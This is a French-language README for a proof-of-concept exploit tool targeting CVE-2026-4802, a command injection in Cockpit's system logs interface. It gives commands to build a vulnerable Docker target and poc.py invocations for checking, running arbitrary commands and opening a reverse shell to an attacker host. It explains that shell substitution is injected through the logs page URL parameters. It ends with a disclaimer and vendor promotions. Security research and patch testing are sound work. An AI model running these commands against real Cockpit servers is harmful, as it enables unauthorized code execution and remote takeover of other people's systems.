
Preuve de concept d'exploitation pour CVE-2026-4802, une vulnérabilité d'injection de commandes dans l'interface des journaux système de Cockpit, permettant l'exécution arbitraire de commandes et des shells inversés.
Une preuve de concept d'exploitation pour CVE-2026-4802, une exécution de code à distance via injection de commandes dans l'interface des journaux système de Cockpit (loadServiceFilters())
Construisez et exécutez l'environnement vulnérable :
$ docker build -t cockpit-vuln .
$ docker run --rm -d --privileged -p 9090:9090 cockpit-vuln
# Vérifier si la cible est vulnérable
$ python3 poc.py --url http://localhost:9090 --user viewer --pass viewer --mode check
# Exécuter des commandes arbitraires
$ python3 poc.py --url http://localhost:9090 --user viewer --pass viewer --mode exec --cmd "id"
# Shell inversé
$ python3 poc.py --url http://localhost:9090 --user viewer --pass viewer --mode reverse --lhost 10.0.0.1 --lport 4444

pkg/systemd/logsJournal.jsx)La fonction loadServiceFilters() dans pkg/systemd/logsJournal.jsx construit des commandes shell en joignant des tableaux en chaînes avec uniquement un échappement des espaces avant de les transmettre à /bin/bash -ec. Les paramètres contrôlés par l'utilisateur provenant du fragment d'URL de la page des journaux (par exemple --since=) atteignent ce chemin de code sans être assainis, permettant l'injection de métacaractères shell tels que la substitution de commande ($(...)).
Cet outil est destiné uniquement à des fins éducatives et de recherche. Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test. L'auteur n'est pas responsable de toute utilisation abusive ou de tout dommage causé par ce programme.
QuimeraX Intelligence est une plateforme avancée d'EASM et de renseignement sur les cybermenaces spécialisée dans l'identification des vulnérabilités critiques dans les systèmes complexes. La plateforme surveille, détecte et alerte de manière proactive les clients sur les menaces de sécurité, garantissant transparence et réponse rapide aux risques potentiels. Les clients reçoivent des notifications immédiates et des rapports complets si leurs systèmes sont jugés vulnérables, leur permettant de prendre des mesures de protection. en savoir plus
Hakai Security est une entreprise de cybersécurité fondée par des professionnels de la sécurité, engagée en faveur de l'excellence technique. Nous proposons des solutions de sécurité sur mesure, notamment des tests d'intrusion avancés, des simulations réalistes de Red Team et des pratiques de développement sécurisé pour protéger de manière proactive les actifs de nos clients contre les cybermenaces en constante évolution.